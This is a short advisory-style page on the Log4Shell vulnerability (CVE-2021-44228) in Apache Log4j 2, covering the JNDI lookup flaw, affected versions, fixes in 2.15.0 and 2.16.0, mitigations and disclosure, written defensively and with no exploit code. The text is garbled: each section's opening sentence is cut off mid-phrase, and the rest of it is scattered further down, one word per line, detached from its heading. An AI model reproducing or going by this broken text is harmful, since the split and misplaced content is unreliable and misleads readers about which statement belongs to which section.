Home

CVE202144228

CVE-2021-44228, also known as Log4Shell, is a critical remote code execution vulnerability in the Apache Log4j 2 Java logging library. The flaw stems from how Log4j 2 processes lookups via the Java Naming and Directory Interface (JNDI). By inserting a specially crafted log message that triggers a JNDI lookup to an attacker controlled service (such as LDAP, RMI, or DNS), an attacker can cause the affected application to load and execute remote code on the host.

Impact and scope: Log4j 2 is widely used in Java applications and services, so the vulnerability potentially

Affected versions and fixes: Initially, Log4j 2.x versions up to 2.14.1 were vulnerable. Apache released fixes

Mitigations and guidance: In the interim, organizations can mitigate risk by setting the system property log4j2.formatMsgNoLookups=true

Discovery and response: The vulnerability was publicly disclosed in December 2021 after discovery by security researchers,

affects
a
large
surface
of
software
across
enterprise
and
consumer
environments.
The
published
base
CVSS
score
for
this
issue
has
been
described
as
critical,
reflecting
the
ease
of
exploitation
and
the
potential
for
full
system
compromise.
beginning
with
version
2.15.0,
which
introduced
mitigations
by
disabling
vulnerable
JNDI
lookups
by
default.
Subsequent
updates
(2.16.0
and
later)
provided
further
hardening
and
removal
of
exposed
functionality,
addressing
related
follow-on
issues.
Users
are
advised
to
upgrade
to
the
latest
Log4j
2.x
release
to
ensure
protection
against
this
and
related
flaws.
or
removing
the
JndiLookup
class
from
the
log4j-core
jar.
Additionally,
restricting
outbound
network
access
to
prevent
connections
to
external
LDAP/RMI/DNS
services,
auditing
logs
for
exploit
attempts,
and
applying
patches
across
all
affected
applications
are
recommended
steps.
including
teams
at
Alibaba
Cloud,
with
rapid
advisories
and
patches
issued
by
Apache
and
software
vendors
to
curb
exploitation
in
the
wild.